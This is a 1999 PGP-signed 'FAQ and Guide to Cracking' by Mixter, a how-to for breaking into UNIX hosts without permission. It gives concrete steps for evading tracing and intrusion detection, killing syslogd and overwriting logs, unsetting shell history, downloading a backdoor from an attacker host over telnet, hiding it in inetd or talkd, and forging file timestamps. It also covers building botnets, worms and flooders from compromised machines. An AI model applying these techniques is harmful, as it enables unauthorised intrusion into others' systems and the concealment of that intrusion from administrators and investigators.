-----BEGIN PGP SIGNED MESSAGE----- FAQ and Guide to Cracking (c) 1999 by Mixter Disclaimer: This is a theoretical instruction to cracking and for informational purposes. It should be seen as an introduction to the methods and strategies used by crackers rather than a howto. The author is not suggesting to perform illegal actions and cannot be held liable for any actions of other individuals who perform any of the actions discussed in this paper and possible resulting damage. Introduction: I am going to describe the methods and strategies used to access various UNIX hosts among the internet unauthorizedly. This guide will not teach you how to hack, neither do you have to be a hacker to use the techniques described here. Hacking means finding your own way to do it, and finding new approaches to accomplishing something. I am only going to supply you with one possible approach to cracking. I. Prerequisites Operating System: You certainly need Unix installed on your home computer. WINDOWS WILL NOT DO IT. I'm not going into details here, but you should take either Net/Open/FreeBSD or Linux because they are POSIX compliant, suitable for Home PC's and most small network tools will compile on them. If you use Linux [1], you should not use the RedHat, SuSE, or Slackware distributions unless you know how to secure them properly. Local root compromise can be fatal as you may reveal your identity. Basic Knowledge: Get experienced in the use with the following tools. Use the 'man' command, and work with them until you fully understand them. These tools are: awk cat chmod dd grep gzip kill ln ls mail mknod more mount ping ps sed sort tar ifconfig ipfwadm last head tail gcc cut find ftp less vim nc (netcat) rcp xhost xterm syslogd inetd telnet ssh finger Security requirements: You need to make sure that no one can compromise your own host. Check security sites to make sure your daemons (servers) are not exploitable. Do not allow anyone to use your box. Disable telnet, rlogin, and whatever you don't need yourself. Ideally, you do not run any servers at all while you are attacking other hosts. Consider encrypting directories and/or complete partitions with encrypted file systems and encrypt emails and files you transfer with PGP. [2] Account: For your activities, you require an ISP account with a direct connection, which normally all ISP provide. You might want to consider not doing any 'cracking' activities from your home at all, in which case you need a fast linux or bsd shell account, which must not be from a commercial shell provider (esp. those who sell eggdrop and irc accounts), and if you use a university account, you need to make sure that they do not watch / monitor their users. If you use a dialup, ensure yourself that no transparent proxies or network monitors (squid etc.) are being run by your provider. Do a traceroute and check your providers backbone routers for NIDS (Intrusion Detection), network monitors, proxies, and anything that seems unusual; alternatively let someone with more knowledge do it. II. Scanning Avoiding track-downs: Where you scan from is up yours. Whatever you do, don't scan from your dialup while using a legit internet account. Everyone knowing your IP is a phone call to your provider away from knowing your identity. If you use fake accounts, avoid using fake or stolen credit cards to make them. Also avoid using 1-800 numbers at all costs, because the 1-800 nodes generally log every calling phone number with access time. Inquire about the ISP you use to make sure he is not in explicit cooperation with federal agencies. Additionally, do not stay longer than 5 (in words: five) hours on the internet without hanging up and reconnecting. Why? If you are logged on, the node has your account associated with your current dynamic IP address for obvious technical reasons, and they also might be able to trace you. Most nodes will not keep a table of which IP belongs to which account once they disconnected, especially on huge ISP where this would take large additional resources. I disrecommend traversing through WinGate and SOCKS servers, because they give you a fake feeling of safety. Often, these servers are logging every access and sometimes they are put up by federal agencies itself. You should ideally relay your connections through a server you have root, hence full control, on, using datapipe, bnc, ssl, or a wingate/socks server with logging completely disabled. Stealthy scanning: A scan not being noticed is a successful scan. Half-Open (SYN) scans are lame, because many daemons will still report a "warning: can't get client address: Connection reset by peer" or similar message, then have someone turn on a sniffer or tcplogd and they see who is scanning them. Advanced and recommended scans are NUL (tcp packet without any flags), XMAS (ack/syn/rst probe), and Maimon scans, which can be done with nmap [3]. If you use connect() scans, which are much more reliable, then use lscan, and get the version info. This generally makes the most sense because you have to get the daemon's versions anyway to see if it is exploitable. Play dead: As you scan, I strongly recommend disabling every single service on the machine you're scanning from and setting packet filtering rules. This will fool the hosts being scanned into thinking your host is down and the scan is spoofed. A few things you should disable: * Inetd ( identd, finger, ftp, telnet ) * All INCOMING tcp connection requests (ipfwadm: -y flag) * ICMP Timestamping, Echo reply, Query (ICMP types 8/13/15/17) * UDP Traceroute queries (udp port range 33400-33500) Also note that -deny is better than -reject, which would send an ICMP unreach packet back instead of keeping totally silent. Non-sequential scanning: This is important: Use non-sequential scanning to avoid intrusion detection systems. An IDS or NIDS is installed on a gateway or router and monitors unusual traffic to certain ports. If you scan 1.1.1.1, 1.1.1.2 .. 1.1.1.255, 1.1.2.1 etc., an intrusion detection system can detect your scan against 1.1.1.*. Instead, scan like this: 1.1.1.1, 1.1.2.1 .. 1.1.255.1, 1.1.1.2 You get the point. What to scan: Most crackers resolve a top-level domain like .com .net or a country like .ee .se .ch etc. using z0ne or axfr from ADM [4], or by using a simple recursive shell script. host -l domain will not do for a scan, because you'll miss all the subnets that way, and there are plenty of them. However, I'd rather suggest scanning complete IP blocks. Depending on your greed, you can either scan a class B (1.1.*.*) or class A (1.*.*.*) network. You might wish to obtain some information about your targets first. To do this, you can query whois.arin.net, the registration center for IP addresses. Lets say you want to scan 192.168.*.* and you want to know who owns that IP block. Type: whois -h whois.arin.net 192.168.0.0 or whois 192.168.0.0@whois.arin.net and you get a short description of the owners of that netblock. If arin.net doesn't find any information, don't scan it, because the IPs are probably not yet in use. Some info on the 'whois' results... Maintained by RIPE.NET = European (no, uk, ch, at, de, se, dk, etc.) Maintained by APNIC.NET = Asian (id, kr, za, ee, tr, li, kh, etc.) Maintained by NIC.xxx = Belonging to country xxx Finding vulnerable hosts: First rule of scanning is: never delete your scan logs. If you think you are completely done with evaluating your logs, then compress, encrypt and store them, dont delete them. New security vulnerabilities will be found sooner or later, then you won't have to scan it all again. From my experience, the vulnerability scanners are almost all bullshit, you dont need them. Use grep and awk to extract the IP numbers from your scan logs, like this... grep "QPOP" port110.log | grep "(version 2.2)" | awk '{print $1}' > 0wn.txt (presuming that your scanner logs like this: "- ") There are a couple of cases where you need an additional scan to find vulnerable versions, which are: Buggy Daemon Scanner Scans for... wu-ftp BETA-18 wuftpscan/ben (private) Writable dir portmap rpcinfo -p (unix tool) Portmap Version ttdbserver rpcinfo ttdb version rstatd statdscan rstatd version mountd mountdscan (rootshell) mountd/nfs version bind binfo-udp (rootshell), bind version nscan (my site), mbind (private) III. Rooting Lets think about the first commands you issue. They should: 1. Discretely remove traces of the root compromise 2. Gather some general info about the system 3. Make sure you can get back in 4. Disable or patch the vulnerable daemon(s) Here are my suggestions... 1. killall -9 syslogd klogd - pesky loggers! only few admins will notice if they get turned off. Now you can act freely. copy secure.1 and messages.1 from /var/log over secure and messages Normally, these logs are the only ones with the intruders IP and traces of a root compromise in them. If *.1 doesn't exist, truncate the files. Also, unset HISTFILE is important. Nobody does unset HISTFILE, thus leaving a .bash_history in /var/named or even /. Very unprofessional :). 2. uname -a, w, last -10, cat /etc/passwd /etc/inetd.conf... Inform yourself about the frequency the system is being maintained, administrated, if the logfiles are being analyzed. * Look how many people have access to it (/etc/passwd) - the more the better for you (keeps attention away from you). * Look if the system is already backdoored!! you might want to remove other backdoors. * Look for a loghost or snmp (dangerous because you cant manipulate the logs on a far-away loghost). Watch out for *logd, sniffers, netmon's etc before you do anything great on the host. If you are paranoid, traceroute the host, and see if non-routers are before that host (probably IDS, loghost, sniffer, etc). 3. This is important: DONT MANIPULATE THE SYSTEM CONFIGURATION! DOH! It is too easy to detect you if you add yourself to /etc/passwd, or open a port by manipulating inetd.conf. Let me tell you that root kits and /bin/login trojans are the first things any sane admin will watch for. Install a nice stealthy port backdoor. My approach to uploading files is doing: (on your box) $ uuencode -m backdoor.c backdoor.c | less (on the target box) uudecode # cc -o backdoor backdoor.c A nice different method is putting a daemon on your own box, on port 666, that spits out the source code when someone telnets to it, so you can do telnet ppp-42.haxor.net 666 > backdoor.c As I said, make sure you can get back in. If the box you rooted has an uptime of more than 300 days or so, you might consider not installing the backdoor for startup. Instead, kill the vulnerable daemon, and when the host restarts, come back using an exploit. Normally, you can replace a lame daemon that nobody uses with your backdoor. Look at inetd.conf to see what daemons are active. A safe bet is in.talkd which often is activated but seldom ever used. So, when you want to re-activate your backdoor, talk root@0wned.host.com for a second, and your backdoor is running. You can also add /path/to/backdoor to /root/.profile.. but it is a bit riskier than the inetd backdoor method. 4. Subscribe to bugtraq, CIAC security list, or look at rootshell, to see what you need to do to patch your buggy stuff. If RPM is installed you can try a rpm -U ftp://ftp.cdrom.com/rightdir/daemon.rpm If not, use ncftp to fetch the file anonymously, because it doesn't need user interaction. If you want, add an additional backdoor in your "patched" server. QPOP 2.53 even supports this itself. For all files you replace, you should modify the time stamps, which wont help, if the admin uses tripwire or cksum, but if the admin is, like most admins, a complete lamer that does find / -ctime to scan for trojans and thinks he knows his job. :P To modify timestamps, you do a simple: touch -r /bin/bash /path/to/your/trojan this will copy the exact date/time info from /bin/bash over your freshly added trojan. Voila! The alternative to all this for lazy people is, to add a ipfwadm rule that prevents traffic from the outside (-W eth0) to the ports with the buggy daemons, and adding that command to a rc.d script as well. Bind doesn't need tcp port 53 for anything except zone transfers and the RoTShB/ADM bind exploits. It works fine with 53/tcp firewalled. But be aware that this might get you detected, lets say if you disable port 110 or 143 on an ISP's central mail exchange server... About your backdoor: Port > 10000 is strongly recommended, also a backdoor using UDP, ICMP, or even something as unusual as raw IP is very useful. People that bind /bin/sh to a port are idiots, because they open that host to everyone, letting in sniffers, and probably other people who may damage the host seriously. Make sure to password protect everything that runs as root. A password of a minimum length of 8 characters, because you have no way of detecting a brute force attack. For the C programmers, let me say, listen(sockfd,1). Maybe 2 connections, but not more. For comfortability, you can add some stuff you want to occur on each successful backdoor login, like system("w"), system("killall -9 syslogd klogd"), or whatever. If you want a front-end backdoor with some integrated functions, try gateway[5]. IV. UTILIZING COMPROMISED SYSTEMS About your activities: Do what you desire, but never without disregarding stealthiness. If you stop checking log files, processes, or start something like ping -s 1024 -f cert.org un-stealthed, it is, depending on the admin, a matter of hours or days until you lose the host. Most of the time, losing a host means you cannot get access again, and the admins will examine their system with extreme scrutiny; if they are too lame, they might contact some external security experts or even the Computer Emergency Response Team. Never do serious damage to the system, when you don't have to - and trust me, you won't. Damaging a system by altering vital system files, replacing frequently-used programs or even destroying information is unintelligent, will not do you any good, and will maybe assist you in getting new enemies. And it is trivial to mention not to deface web sites... World domination: As the number of systems you control increases, you might want some kind of easy remote control, utilization for attacks, and detection of detection of your activities. You can install newnick bots or eggdrop bots with fancy scripts which can be controlled through IRC to make life easier (make sure to sit and think before you consider doing anything big with them on IRC!). You can make your own inter-linked network of root systems, in which case you need to start programming because no one will release such a program to the public. :) You can make a little packages with spoofing flooders, smurf and the like, if you decide becoming a packet warrior (then again, it won't help you accomplishing anything but getting irc channels or shutting down government sites...). Alternatively, you can use every root you get to scan new netblocks, and have the information mailed to you or whatever. You can make an internet worm like ADMw0rm [4], B4b0w0rm, millennium worm (the last 2 are private), and install them on your roots; make sure it is well constructed and bug-free... If you are a creative person, you can make them scan large amounts of ISP dialup netblocks for back orifice, netbus server, backdoor G, and what not, and write something that controls their computers to spread more trojans, send their mail to you, get their passwords, flood, scan, invade their private lives... no wait, that's the governments job. V. YOUR PRESENCE ON THE NET Smart behavior and senseless behavior: What you do besides cracking, mostly happens on IRC. IRC should be seen as a tool for getting in touch with other skilled persons and exchanging thoughts and information. To avoid wasting your time, skills, and possibly getting busted, here are some things which you SERIOUSLY should not be doing: 1) Warez. Stay away from warez, it is a waste of time. Warez ruins productive people and makes software expensive. Besides the moral bullshit, you can always get something you really need (#1 net game, enterprise application etc.), and you don't need much, trust me. Almost everything security / hacking related is free. Joining a warez group gets you a) alot of vhosts with lame names b) idiotic friends c) on the FBI blacklist - nothing besides that. 2) 'IRC War'. Groups like core, chrome, enforce, conflict, takeover, madcrew, phorce, tnt, etc. etc. who call themselves 'War' groups, are good for nothing. Why would you want to be a member of a group that attacks other similar groups and channels - it is comparable to the mafia - almost as violent, dangerous, except that you don't get rich. If you think you need 'WarGroup' support for taking a channel with reasonable security, you are lame or you can't take a challenge. Think again. 3) Hacking related groups. Inform yourself about what happened to gH or 'global Hell'. Most of these groups do the exact opposite of what is advised in this paper. If you get an offer to join: l0pht, cDc, MOD, thc, or ADM, take it because you'll learn a lot, all other groups are not worth your time. 4) IRC operators, BOFH, admin of big systems. Stay away from them until you are confidently prepared and willing to fight with them. Blindly attacking them can also be a waste of time, but it can also become a reasonable challenge. Keep up to date: The more you advance in cracking skills, or even might consider hacking, programming or developing, the web probably gets the part of the web you use least. Visit your favorite security related sites frequently, and make sure to keep up to date about security breaches, law enforcement, exploits, changes in the methods of crackers and admins. My bookmarks certainly include Packetstorm security [6] and GeekGirl [7]. URLS: [1] ftp://ftp.cdrom.com/pub/linux/distributions [2] http://members.xoom.com/i0wnu/pgp.html [3] http://www.nmap.org [4] ftp://ftp.adm.isp.at/pub/ADM [5] http://members.xoom.com/i0wnu/gateway.tgz [6] http://www.genocide2600.com/~tattooman [7] http://www.geek-girl.com -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQEVAwUBN2VcO7dkBvUb0vPhAQGtPgf+Iglo6ZZh7sF/WbeteyTGYaw0D9AJR4IH A7hBo9AUwm3ZO7gDhdzLvDlOjXiMxhhJ2Jey/Y6M5Bb5LvZf8tK4EoUIF/UA8ifU E6fd18zBDJep2LFaHyzXegA5oCWCYjpb3ZcFtbtpcA2He1hU85QUknOAHZ6lJyiV JJZziWnXRkAcmRpzbLkTgVydisgugNwfYs9OJH/GNMCKQzeKB+MJrQ7wNlNOdV6T 7u4Jt1q1hW7P5p3xi6ETS196qQ7NO+46FqTEShk6HC+wl7EDwv8VTbz5lEGjBVXz JEiIIAM5YfbGRbu65fTIlhI0u5N8OxKkX74HOGcBsInQlzuCNq6aMA== =o8mY -----END PGP SIGNATURE-----